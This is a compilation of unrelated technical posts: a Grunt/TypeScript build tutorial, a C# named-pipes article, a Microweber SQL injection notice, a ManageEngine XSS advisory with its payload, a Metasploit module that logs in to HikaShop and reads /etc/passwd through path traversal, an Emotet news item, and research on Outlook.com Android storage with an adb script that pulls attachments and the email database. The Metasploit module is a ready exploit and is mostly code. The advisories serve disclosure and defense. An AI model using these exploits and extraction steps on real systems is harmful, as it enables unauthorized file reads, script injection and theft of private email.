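For orientation, the package.json at this point (as generated by npm init and updated by the --save-dev install) would look roughly like the following sketch; the name and exact version range are assumptions:

{
  "name": "helloworld",
  "version": "0.0.0",
  "description": "",
  "main": "index.js",
  "devDependencies": {
    "grunt": "~0.4.1"
  }
}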
Now to prepare some folder structure:

dist - all output JS, CSS & HTML pages, platform packages etc.
lib - external libraries
images - images for our project
platform - platform specific files
styles - Stylus or CSS styles
src - Typescript files
views - Jade or HTML pages

Typescript

Typescript is the new kid on the block from Microsoft, which aims to help with the most critical issues of Javascript in larger projects - module loading, classes & interfaces, and static typing. A great thing about Typescript is that it's a superset of JS - this means that every JS file is automatically Typescript - and that Typescript follows the proposed features for ECMAScript 6, which in the future should allow Typescript files to run without compilation. For now we still need to compile Typescript into Javascript, so we install a new Grunt task:

npm install grunt-typescript --save-dev

Now we need to tell Grunt to load the new task and tell it how to translate Typescript files into Javascript by updating Gruntfile.js:

module.exports = function(grunt) {
  // Project configuration.
  grunt.initConfig({
    pkg: grunt.file.readJSON('package.json'),
    typescript: {
      base: {
        src: ['src/**/*.ts'],
        dest: './dist/www/js',
        options: {
          module: 'amd', //or commonjs
          target: 'es5', //or es3
          base_path: 'src'
        }
      }
    }
  });

  grunt.loadNpmTasks('grunt-typescript');
  grunt.registerTask('default', ['typescript']);
};

And create our main Typescript file (in src/main.ts):

export class Main {
    constructor() {
        console.log("main.init()");
    }

    run() {
        var self = this;
        console.log("main.run()");
    }
}

Now we can run the grunt command again and we should get a compiled main.js in dist/www. The reason for adding a specific www folder is that it's usually faster to do a first check in a desktop browser like Chrome rather than building for a specific platform - this desktop version will be our default target, which will later be incorporated into the target for building for a specific platform. The file that we got is built for dynamic module loading via the AMD mechanism - unfortunately no current browser supports this, so we need to add support for it.

Dynamic module loading

A usual problem with larger web projects is the separation of code modules and code dependencies - in order to keep a project maintainable we need to split functionality into multiple JS files, however there is no way to state that one JS module requires another JS module directly in the JS file, since this needs to be specified in the HTML file by script tags (and usually also in the correct order). To resolve this issue, script loaders like RequireJS use the AMD format to specify which modules a script requires. Fortunately Typescript can export module dependencies in AMD format as well, which makes it suitable for our purposes. We will start by creating src/config.ts (which will serve as the main entry point into the application and in the future will also hold the RequireJS shim configuration for external libraries), but for now it will be pretty simple:

import main = module("main");

var Main = new main.Main();
Main.run();

This code will import the main.ts file, instantiate the Main class and run the Main.run() method. Now we need to create a sample web page that will demonstrate module loading (views/index.html):

<html>
  <head>
    <script data-main="js/config" src="js/require.js"></script>
  </head>
  <body>
    <div id="corpus">
      Hello world!
    </div>
  </body>
</html>

Additionally, we download the RequireJS file into lib/require.js and tell Grunt to copy both HTML and JS files into their respective locations.
For this we will need the contrib-copy task:

npm install grunt-contrib-copy --save-dev

And update Gruntfile.js:

module.exports = function(grunt) {
  // Project configuration.
  grunt.initConfig({
    pkg: grunt.file.readJSON('package.json'),
    typescript: {
      base: {
        src: ['src/**/*.ts'],
        dest: './dist/www/js',
        options: {
          module: 'amd', //or commonjs
          target: 'es5', //or es3
          base_path: 'src'
        }
      }
    },
    copy: {
      libs: {
        files: [
          { flatten: true, expand: true, src: ['lib/require.js'], dest: 'dist/www/js/'}
        ]
      },
      html: {
        files: [
          { flatten: true, expand: true, src: ['views/index.html'], dest: 'dist/www'}
        ]
      }
    },
  });

  grunt.loadNpmTasks('grunt-typescript');
  grunt.loadNpmTasks('grunt-contrib-copy');

  // Default task(s).
  grunt.registerTask('default', ['copy:libs', 'typescript', 'copy:html']);
};

We now have 2 subtasks of the copy task (libs and html) - this way we can create build steps of the same task that can be used for different targets or purposes. By running grunt from the command line we should get a new structure in the dist/www folder, and opening dist/www/index.html should write two messages into the development console.

Packaging for mobile platform

In this example we will focus on the Tizen platform, since it has native support for web applications, but with a few modifications it's possible to integrate the PhoneGap (Apache Cordova) framework as well and target Android, iOS, Windows Phone and other platforms. Tizen works with HTML5 packaged web app files, which is basically a zip file with a config.xml defining the package metadata. We will start by creating this file in platform/tizen:

<?xml version="1.0" encoding="UTF-8"?>
<widget xmlns="http://www.w3.org/ns/widgets" xmlns:tizen="http://tizen.org/ns/widgets"
        id="http://org.example/helloWorld" version="1.0" viewmodes="fullscreen">
  <icon src="icon.png"/>
  <content src="index.html"/>
  <name>helloWorld</name>
  <tizen:application id="c8ETUJghqu" required_version="1.0"/>
</widget>

Additionally we will need an application icon which will be displayed in the main menu (platform/tizen/icon.png). The last bit is the zip task for Grunt:

npm install grunt-zip --save-dev

And we can update Gruntfile.js to pull it together:

module.exports = function(grunt) {
  // Project configuration.
  grunt.initConfig({
    pkg: grunt.file.readJSON('package.json'),
    typescript: {
      base: {
        src: ['src/**/*.ts'],
        dest: './dist/www/js',
        options: {
          module: 'amd', //or commonjs
          target: 'es5', //or es3
          base_path: 'src'
        }
      }
    },
    copy: {
      libs: {
        files: [
          { flatten: true, expand: true, src: ['lib/require.js'], dest: 'dist/www/js/'}
        ]
      },
      html: {
        files: [
          { flatten: true, expand: true, src: ['views/index.html'], dest: 'dist/www'}
        ]
      },
      tizen: {
        files: [
          { flatten: true, expand: true, src: ['platform/tizen/**'], dest: 'dist/tizen'},
          { flatten: true, expand: true, src: ['dist/www/index.html'], dest: 'dist/tizen'},
          { flatten: true, expand: true, src: ['dist/www/js/*'], dest: 'dist/tizen/js'}
        ]
      }
    },
    zip: {
      tizen: {
        src: 'dist/tizen/*',
        cwd: 'dist/tizen',
        dest: 'dist/helloWorld.wgt'
      }
    }
  });

  grunt.loadNpmTasks('grunt-typescript');
  grunt.loadNpmTasks('grunt-contrib-copy');
  grunt.loadNpmTasks('grunt-zip');

  // Default task(s).
  grunt.registerTask('default', ['copy:libs', 'typescript', 'copy:html']);
  grunt.registerTask('tizen', ['default', 'copy:tizen', 'zip:tizen']);
};

Now we can invoke either the grunt command without parameters or, if we wish to build the Tizen target, grunt with the tizen parameter:

grunt tizen

In the next part we will take a look at how to tie in the additional template engines Jade and Stylus and how to build an MVVM application using Knockout.js.
The complete project can be downloaded at the link above, but it's distributed without the node_modules folder, so it is necessary to run the following command from the project directory to load dependencies:

npm install

Source
-
NamedPipes

Source

Introduction

This article describes a messaging library which can be used to send a message between two .Net applications running on the same network. The library allows a simple string to be sent between a Client and Server application. The library uses Named Pipes in its internal implementation. For more information on Named Pipes visit the MSDN page. I also used the following Code Project articles as a starting point for developing the library:

Inter-Process-Communication-in-NET-Using-Named-Pip
Csharp-Async-Named-Pipes

Background

I recently came across a scenario where I needed to notify an application that an upgrade was waiting to start. I needed a simple mechanism that would allow me to signal the application. Once signalled, the application would safely shut down, allowing the upgrade to start. I investigated a number of IPC solutions before developing this library. I settled on Named Pipes as it was the most lightweight method of IPC I could find.

Using the code

The library is simple to use; there are two main entry points, the PipeServer and the PipeClient. The following code snippet is copied from the sample application included in the source code:

var pipeServer = new PipeServer("demo", PipeDirection.InOut);
pipeServer.MessageReceived += (s, o) => pipeServer.Send(o.Message);
pipeServer.Start();

var pipeClient = new PipeClient("demo", PipeDirection.InOut);
pipeClient.MessageReceived += (s, o) => Console.WriteLine("Client Received: value: {0}", o.Message);
pipeClient.Connect();

The sample application demonstrates using the library to build a simple echo server. The MessageReceived event handler simply echoes any messages received from the client.

PipeServer

Start

The Start method calls BeginWaitForConnection, passing a state object. The Start method is overloaded, allowing the caller to provide a cancellation token.

public void Start(CancellationToken token)
{
    if (this.disposed)
    {
        throw new ObjectDisposedException(typeof(PipeServer).Name);
    }

    var state = new PipeServerState(this.ServerStream, token);
    this.ServerStream.BeginWaitForConnection(this.ConnectionCallback, state);
}

Stop

The Stop method simply calls the Cancel method of the internal CancellationTokenSource. Calling Cancel sets the IsCancellationRequested property of the token, which gracefully terminates the server.

public void Stop()
{
    if (this.disposed)
    {
        throw new ObjectDisposedException(typeof(PipeServer).Name);
    }

    this.cancellationTokenSource.Cancel();
}

Send

The Send method first converts the provided string to a byte array. The bytes are then written to the stream using the BeginWrite method of the PipeStream.

public void Send(string value)
{
    if (this.disposed)
    {
        throw new ObjectDisposedException(typeof(PipeServer).Name);
    }

    byte[] buffer = Encoding.UTF8.GetBytes(value);
    this.ServerStream.BeginWrite(buffer, 0, buffer.Length, this.SendCallback, this.ServerStream);
}

ReadCallback

The ReadCallback method is called when data is received on the incoming stream. The received bytes are first read from the stream, decoded back to a string and stored in the state object. If the IsMessageComplete property is set, this indicates that the Client has finished sending the current message; the MessageReceived event is invoked and the Message buffer is cleared. If the server has not stopped - indicated by the cancellation token - and the client is still connected, the server continues reading data; otherwise the server begins waiting for the next connection.
private void ReadCallback(IAsyncResult ar)
{
    var pipeState = (PipeServerState)ar.AsyncState;
    int received = pipeState.PipeServer.EndRead(ar);

    string stringData = Encoding.UTF8.GetString(pipeState.Buffer, 0, received);
    pipeState.Message.Append(stringData);

    if (pipeState.PipeServer.IsMessageComplete)
    {
        // Raise the event with the full accumulated message (mirrors the client implementation).
        this.OnMessageReceived(new MessageReceivedEventArgs(pipeState.Message.ToString()));
        pipeState.Message.Clear();
    }

    if (!(this.cancellationToken.IsCancellationRequested || pipeState.ExternalCancellationToken.IsCancellationRequested))
    {
        if (pipeState.PipeServer.IsConnected)
        {
            pipeState.PipeServer.BeginRead(pipeState.Buffer, 0, 255, this.ReadCallback, pipeState);
        }
        else
        {
            pipeState.PipeServer.BeginWaitForConnection(this.ConnectionCallback, pipeState);
        }
    }
}

PipeClient

Connect

The Connect method simply establishes a connection to the PipeServer and begins reading the first message received from the server. An interesting caveat is that you can only set the ReadMode of the ClientStream once a connection has been established.

public void Connect(int timeout = 1000)
{
    if (this.disposed)
    {
        throw new ObjectDisposedException(typeof(PipeClient).Name);
    }

    this.ClientStream.Connect(timeout);
    this.ClientStream.ReadMode = PipeTransmissionMode.Message;

    var clientState = new PipeClientState(this.ClientStream);
    this.ClientStream.BeginRead(clientState.Buffer, 0, clientState.Buffer.Length, this.ReadCallback, clientState);
}

Send

The Send method for the PipeClient is very similar to the PipeServer's. The provided string is converted to a byte array and then written to the stream.

public void Send(string value)
{
    if (this.disposed)
    {
        throw new ObjectDisposedException(typeof(PipeClient).Name);
    }

    byte[] buffer = Encoding.UTF8.GetBytes(value);
    this.ClientStream.BeginWrite(buffer, 0, buffer.Length, this.SendCallback, this.ClientStream);
}

ReadCallback

The ReadCallback method is again similar to PipeServer.ReadCallback, without the added complication of handling cancellation.

private void ReadCallback(IAsyncResult ar)
{
    var pipeState = (PipeClientState)ar.AsyncState;
    int received = pipeState.PipeClient.EndRead(ar);

    string stringData = Encoding.UTF8.GetString(pipeState.Buffer, 0, received);
    pipeState.Message.Append(stringData);

    if (pipeState.PipeClient.IsMessageComplete)
    {
        this.OnMessageReceived(new MessageReceivedEventArgs(pipeState.Message.ToString()));
        pipeState.Message.Clear();
    }

    if (pipeState.PipeClient.IsConnected)
    {
        pipeState.PipeClient.BeginRead(pipeState.Buffer, 0, 255, this.ReadCallback, pipeState);
    }
}

Points of Interest

NamedPipes vs AnonymousPipes

The System.IO.Pipes namespace contains a managed API for both AnonymousPipes and NamedPipes; the MSDN page contrasts the two. I based the library on Named pipes because I wanted the library to support duplex communication. Also, the parent-child model of Anonymous pipes didn't fit my scenario.

PipeTransmissionMode

Named pipes offer two transmission modes: Byte mode and Message mode. In Byte mode, messages travel as a continuous stream of bytes between the client and server. In Message mode, the client and the server send and receive data in discrete units. In both modes a write on one side will not always result in a same-size read on the other. This means that a client application and a server application do not know how many bytes are being read from or written to a pipe at any given moment.
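To make that concrete, here is a minimal standalone sketch (not taken from the library) of reading one complete message in Message mode; the pipe name and buffer size are arbitrary:

using System;
using System.IO.Pipes;
using System.Text;

class MessageModeDemo
{
    static void Main()
    {
        // A Message-mode server: each client Write corresponds to one discrete message.
        using (var server = new NamedPipeServerStream(
            "demo", PipeDirection.InOut, 1,
            PipeTransmissionMode.Message, PipeOptions.None))
        {
            server.WaitForConnection();

            var buffer = new byte[256];
            var message = new StringBuilder();
            do
            {
                // A single Read may return fewer bytes than the client wrote...
                int read = server.Read(buffer, 0, buffer.Length);
                message.Append(Encoding.UTF8.GetString(buffer, 0, read));
            }
            while (!server.IsMessageComplete); // ...so loop until the message boundary is reached

            Console.WriteLine("Received: {0}", message);
        }
    }
}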
In Byte mode the end of a complete message could be identified by searching for an End-Of-Message marker. This would require defining an application-level protocol, which would add needless complexity to the library. In Message mode the end of a message can be identified by reading the IsMessageComplete property, which is set to true by calling Read or EndRead.

Source Code

If you would like to view the library's source code and demo applications, the code can be found on my Bit Bucket site:

https://bitbucket.org/chrism233/namedpipes

The git repository address is as follows:

https://chrism233@bitbucket.org/chrism233/namedpipes.git

Source
-
# Exploit Title: SQL Injection in Microweber CMS 0.95
# Google Dork: N/A
# Date: 12/16/2014
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: Microweber (https://microweber.com/)
# Software Link: https://github.com/microweber/microweber
# Version: 0.95
# Tested on: N/A
# CVE: CVE-2014-9464

::PROOF OF CONCEPT::

GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html
- https://www.youtube.com/watch?v=SSE8Xj_-QaQ
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464

::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

Source
-
Security Advisory:

Exploit Title: ManageEngine ADSelfService Plus Reflected Cross Site Scripting (XSS)
Google Dork: N/A
Exploit Author: Blessen Thomas
Date: 03-01-2015
Vendor Homepage:
Software Link: N/A
Version: ADSelfService Plus version 5.1 Build 5102, Evaluation version (Trial)
Tested on: Windows XP SP2 (host machine), Windows Server 2003 as Active Directory
CVE: CVE-2014-3779
Type of Application: Web application
Release mode: Coordinated disclosure

Vulnerability Description:

It is observed that ManageEngine ADSelfService Plus is vulnerable to reflected (non-persistent/temporary) cross-site scripting attacks in the "name" parameter, and the unfiltered input is reflected back to the user.

Proof of concept:

Request:

POST /GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription HTTP/1.1
Host: 192.168.163.134:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription
Cookie: JSESSIONIDADSSP=A4144A81CF9702C53035062DBA9CD0F3; JSESSIONIDSSO=D8EE830B96B0218E4548BA3B8ADD09DB; adsspcsrf=79cf454e-9b3f-462b-bb12-03b70cd2f469
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

subID=0&name=test"";</script><script>alert(0)</script><"&desc=test&domains=test.com&domainName=test.com&hidden_grps=%7B%22group%22%3A%7B%22%7B1CE0BEAF-207E-4C48-B893-8A3B0FB49CFF%7D%22%3A%22Account+Operators%22%7D%7D&hidden_usrs=%7B%22user%22%3A%7B%22%7BC4520992-9D3F-439D-82F7-0869AF3BF267%7D%22Administrator%22%7D%7D&viewMembers=on

Parameter affected: name
Payload (exploit code): "";</script><script>alert(0)</script><"
Vulnerable link: 192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription
Tools used: Mozilla Firefox browser v28.0, Burp proxy free edition v1.5

## Workaround ##
----------------
Update to the newer version 5.2 Build 5202:
http://www.manageengine.com/products/self-service-password/download.html?btmMenu

## Timeline ##
----------------------
13th Apr 2014: Bug discovered
15th Apr 2014: Vendor was notified by e-mail
16th Apr 2014: Vendor response received
13th May 2014: Vendor acknowledged and released a patch
22nd May 2014: Mitre team provided CVE id
03rd Jan 2015: Public disclosure

Source
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HikaShop - LFI poc for authenticated users',
      'Description' => %q{
        HikaShop 2.3.3 is vulnerable to local file include attack.
        Authenticated user can read local files from the server.
        Vulnerability was described on https://twitter.com/HauntITBlog
      },
      'Author'      =>
        [
          'HauntIT Blog', # Discovery / msf module
          'http://hauntit.blogspot.com'
        ],
      'License'     => MSF_LICENSE,
      'Privileged'  => false,
      'Platform'    => ['php'],
      'Arch'        => ARCH_PHP,
      'Targets'     => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '03.01.2015'))

    register_options(
      [
        OptString.new('TARGETURI', [true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin']),
        OptRegexp.new('FAILPATTERN', [false, 'Pattern returned in response if login failed', '/error/']),
      ], self.class)
  end

  def check
    # not implemented
  end

  def fetchMd5(my_string)
    if my_string =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end

  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'administrator', 'index.php')
    })

    cookies = req1['set-cookie']
    if not req1
      fail_with("[-] Failed with 1st request")
    end

    print_status("[+] Resp code: " + req1.code.to_s)
    print_good("[+] Cookie(s) : " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Token : " + token.to_s)
    else
      print_status("[-] Token not found")
    end

    # now we need to do auth using that token and cookies
    print_status("[+] 2nd request (post with auth)")
    auth = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'    => cookies,
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'passwd'   => datastore['PASSWORD'],
        'option'   => 'com_login',
        'task'     => 'login',
        'return'   => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
        token.to_s => 1
      }
    })

    print_good("[+] Code after auth: " + auth.code.to_s)

    # 3rd step: get + post params to lfi
    print_status('[+] and now 3rd request...')
    xpl = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'vars_get' => {
        'option' => 'com_hikashop',
        'ctrl'   => 'view',
        'task'   => 'edit',
        'id'     => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
      },
      'cookie'   => cookies
    })

    if xpl
      print_good("[+] 3rd response code: " + xpl.code.to_s)
      print_good("[+] 3rd (full) response body:")
      print_status(xpl.body)
    else
      fail_with("[-] Cannot exploit it :C")
    end
  end # exploit
end

Source
-
A new spam email campaign making the rounds in Germany is delivering a new variant of a powerful banking malware, a financial threat designed to steal users' online banking credentials, according to security researchers from Microsoft.

The malware, identified as Emotet, was first spotted last June by security vendors at Trend Micro. The most standout feature of Emotet is its network sniffing ability, which enables it to capture data sent over secured HTTPS connections by hooking into eight network APIs, according to Trend Micro.

Microsoft has been monitoring a new variant of the Emotet banking malware, Trojan:Win32/Emotet.C, since November last year. This new variant was sent out as part of a spam email campaign that peaked in November. Emotet has been distributed through spam messages which either contain a link to a website hosting the malware or a PDF document icon that is actually the malware.

HeungSoo Kang of Microsoft's Malware Protection Center identified a sample of the spam email message that was written in German, including a link to a compromised website. This indicates that the campaign primarily targeted German-language speakers and banking websites.

The spam messages are written in such a way that they easily gain the attention of potential victims. They may masquerade as some sort of fraudulent claim, such as a phone bill, an invoice from a bank or a message from PayPal.

Once it infects a system, Emotet downloads a configuration file which contains a list of banks and services it is designed to steal credentials from, and also downloads a file that intercepts and logs network traffic. Network sniffing is an especially disturbing part of this malware because it makes the cyber criminal omniscient to all information being exchanged over the network. In short, users can go about their online banking without even realizing that their data is being stolen.

Emotet will also pull credentials from a variety of email programs, including versions of Microsoft's Outlook, Mozilla's Thunderbird, and instant messaging programs such as Yahoo Messenger and Windows Live Messenger.

Spam emails containing the Emotet malware are difficult for email servers to filter because the messages actually originate from legitimate email accounts. Therefore, typical anti-spam techniques, such as callback verification, won't be applicable to it. However, there is one technique to stop these spam messages - reject all messages that come from bogus accounts by checking whether the account from which you received the spam email really exists.

Users are also advised not to open or click on links and attachments that are provided in any suspicious email, but if the message is from your banking institution and of concern to you, then confirm it twice before proceeding.

Source
-
In November of 2013 our research team spent some time reverse engineering popular mobile applications to get some practice reversing interesting apps. After reviewing these types of apps, we noticed a trend: some messaging apps did not take any steps to ensure the confidentiality of their locally stored messages. In light of similar issues having recently been deemed a concern on other platforms, we thought we'd publish one of our examples to increase user awareness of such behaviors.

The application we're discussing here is the mobile client for Microsoft's free Outlook.com email service. The app is described as being created by Seven Networks in conjunction or in association with Microsoft (i.e. it looks like it was outsourced). The app allows users to access their Outlook.com email on Android devices. In the course of our research we found that the on-device email storage doesn't really make any effort to ensure the confidentiality of messages and attachments within the phone filesystem itself. After notifying Microsoft (the vendor notification timeline is found at the end of this post), they disagreed that our concern was a direct responsibility of their software; in light of similar problems with iOS being deemed a concern by privacy advocates, we thought it'd be a good idea to share what we see with the Outlook.com app.

Root Cause: A Common Problem with the Privacy of Mobile Messaging Apps

We feel a key security and privacy attribute of any mobile messaging application is the ability to maintain the confidentiality of data stored on the device the app runs on. If a device is stolen or compromised, a 3rd party may try to obtain access to locally cached messages (in this case emails and attachments). We've found that many messaging applications (stored email or IM/chat apps) store their messages in a way that makes it easy for rogue apps or 3rd parties with physical access to the mobile device to obtain access to the messages. This may be counter to a common user expectation that entering a PIN to "protect" their application would also protect the confidentiality of their messages. At the very least, app vendors can warn the user and suggest that they encrypt the file system, as the application provides no assurance of confidentiality. Or take it to the next level and proactively work with the user to encrypt filesystems at installation time.

The Outlook.com Mobile App Behaviors

We've found the following two behaviors of the app:

The email attachments are stored in a file system area that is accessible to any application or to 3rd parties who have physical access to the phone.
The emails themselves are stored on the app-specific filesystem, and the "Pincode" feature of the Outlook.com app only protects the Graphical User Interface; it does nothing to ensure the confidentiality of messages on the filesystem of the mobile device.

We feel users should be aware of cases like this, as they often expect that their phone's emails are "protected" when using mobile messaging applications.

Recommendations to Users

We recommend that the setting Settings => Developer Options => USB debugging be turned OFF. We further recommend using Full Disk Encryption for the Android and SDcard file systems. This would prevent a 3rd party from getting access to any data in plain text, whether from a messaging app or from other apps that may choose to store private data on the SDcard. Users may change the email attachments download directory via Settings -> General -> Attachments Settings -> Attachment Folder.
It is advised not to set the download directory for attachments to /sdcard/external_sd, as this will place email attachments on the removable SDCard (if one is in place).

For the tech and security folks reading this post, we'll now dive into how we investigated these software behaviors.

Behavior #1: Attachments are placed in a possibly world-readable folder.

Outlook.com for Android downloads email attachments to the SDcard partition by default. For almost all versions of Android this places the attachments in a world-readable folder. This places downloaded email attachments in a storage area accessible to any user or application which can access the SDcard (e.g. any app granted the READ_EXTERNAL_STORAGE permission), even if the phone is not rooted. A 3rd party would simply use an ADB shell in order to find the attachments, which are located in /sdcard/attachments. The attachments can then be pulled from the device using ADB.

Bas Bosschert in his post shows how files from the SDcard may be uploaded to a server. Hence, using a similar technique, a rogue application needs only the READ_EXTERNAL_STORAGE and INTERNET permissions to exfiltrate data from the SDcard to the Internet; these permissions are among the most common permissions granted by users to applications upon installation.

Users of the latest Android 4.4 or later devices would not see this behavior as having security/privacy ramifications, since the SDcard partition is not world-readable on Android 4.4 and above. However, note that Android 4.4 was released on October 31, 2013, and at the time of this writing a large market share of devices are not running this latest version of Android OS.
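As a rough illustration of how little is needed here (this sketch is ours, not part of the original write-up), the listing and pull steps can be scripted around the standard adb utility; the destination directory is arbitrary, and /sdcard/attachments is the default location noted above:

# Sketch: list and pull Outlook.com attachments over adb.
# Requires a connected device with USB debugging enabled and adb on PATH.
import subprocess

def pull_attachments(dest_dir: str = "./loot") -> None:
    listing = subprocess.run(
        ["adb", "shell", "ls", "/sdcard/attachments"],
        capture_output=True, text=True, check=True)
    print("Attachments on device:\n" + listing.stdout)
    # adb pull copies the whole directory to the local machine.
    subprocess.run(["adb", "pull", "/sdcard/attachments", dest_dir], check=True)

if __name__ == "__main__":
    pull_attachments()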
Behavior #2: Pincode does not protect/encrypt downloaded emails or attachments.

Outlook.com provides a Pincode feature. When activated, users have to enter a code in order to interact with the application (launch it, resume it, etc). This feature is not enabled by default in the application: the user must manually enable it.

We've found that the Pincode feature does not encrypt the underlying data; it only protects the Graphical User Interface, and we feel this is a behavior users should be aware of. This is something that a lot of people reading this blog might think is obvious, but we surveyed a couple of non-tech users (hi mom!) and found that the expectation of privacy for the Pincode feature was present. Meaning the user expected that the Pincode would "...protect the whole thing, including the emails" -Mom. After 10 wrong Pincode attempts the app will delete the account.

The Pincode functionality is located in the com.seven.Z7.app.AppLock class. When a Pincode is created it is passed to AppLock.createHashedPassword(). This creates a custom Base64-encoded SHA1 of the passcode, which is stored in the preferences cache (in AppLock.saveHashPassword()). Whenever a Pincode is entered to unlock the app, the same custom Base64-encoded SHA1 is applied to the Pincode and then compared to the stored value for the unlock to succeed (method call: AppLock.testMatchExistingPassword(), called from AppLockPasswordEntry.validatePassword()).

The Pincode is sufficient to stop a party who will only try to access the Outlook client via the phone screen interface. It will not prevent a party who has access to the filesystem on the device via USB (e.g. ADB). If USB debugging is enabled and the device is rooted, a 3rd party would be able to access the cached emails database. The 3rd party would simply have to run an ADB shell and navigate to the working directory of the Outlook.com application (which is /data/data/com.outlook.Z7) in order to find the databases folder. A 3rd party could retrieve the email database file from a rooted phone via standard use of the adb utility. Alternatively, the backup trick outlined by Sergei Shvetsov would allow access to the app-specific filesystem on a non-rooted mobile device. First the email.db would have to be pulled from the phone via adb, and then the relevant data could be accessed by a utility such as sqlite3 (this whole thing can be automated to execute instantly).

Email bodies are stored in two tables: a plaintext Preview table containing a short snippet of the email, and an html_body table containing the full email including HTML markup. Extraction of sensitive data is simpler if the sensitive data is in a short email or at the beginning of a long email, since the first few lines of the email will be placed in plain text in the Preview column. In this example we have pulled out the body of an email from the Preview table in the database. In the example below we read a specific email (email _id #20) instead of dumping out all email previews. If the email is longer than the Preview will store, this is not a problem; we just have to pull out the email and then read the HTML with something sane. Email #18 was crafted to contain a large bit of text from Wikipedia with credentials added to the end. To read out the entire email spool, just remove the WHERE clause from above; the WHERE clause was merely added for brevity.
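To make the read-out step concrete, here is a minimal Python sketch of querying a pulled copy of email.db. The table and column names (Preview, _id) are assumptions based on the description above, not a verified schema; check the actual layout with .schema in the sqlite3 shell first:

# Sketch: read cached message previews from a pulled copy of email.db.
# Table/column names are assumptions taken from the description above;
# verify them against the real schema before relying on this.
import sqlite3

conn = sqlite3.connect("email.db")  # pulled from /data/data/com.outlook.Z7/databases/
cur = conn.cursor()

# One specific message, mirroring the email _id #20 example; drop the
# WHERE clause to dump every preview in the spool.
for row in cur.execute("SELECT _id, Preview FROM Preview WHERE _id = ?", (20,)):
    print(row)

conn.close()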
Recommendations for Mobile App Developers

A good defensive measure would be to check the mobile device to see if encryption is enabled by calling getSystemService() to obtain a DevicePolicyManager object, and then querying that object with getStorageEncryptionStatus() to check if the device is encrypted with native filesystem encryption. If the device is not encrypted, the application might show a prompt asking the user if they'd like to apply Full Disk Encryption to both the device and the SDcard, or accept the risk of not having an encrypted filesystem before storing data in the Outlook.com for Android application.

Alternatively, the Outlook.com for Android app could use 3rd-party add-ons (such as SQLCipher) to encrypt the SQLite database, in tandem with transmitting the attachments as opaque binary blobs to ensure that the attachments can only be read by the Outlook.com app (perhaps using the JOBB tool). These methods would be useful for older devices (such as devices that run Android 4.0 and earlier) that do not support full disk encryption.

Digital Forensics Notes

Digital forensics technicians interested in obtaining the account information for investigations would take note of the following. The application working directory on the Android device is located at /data/data/com.outlook.Z7. The subdirectories contain the following information:

cache/ - contains the various webcaches for content being pulled into webviews
databases/ - contains the database files where the content of messages, emails, and contact lists are kept
files/ - log files for the client and the engine
lib/ - empty
shared_preferences/ - contains xml files which reflect the state of the user options on the client

The account email username is kept in the file /data/data/com.outlook.Z7/shared_prefs/com.outlook.Z7_preferences.xml. The username can be found by searching for the string "email_addresses" in that file. The actual human name of the account is stored in the log files located at /data/data/com.outlook.Z7/files. Looking for the string "connector" within the files in that directory will show the name and account information.

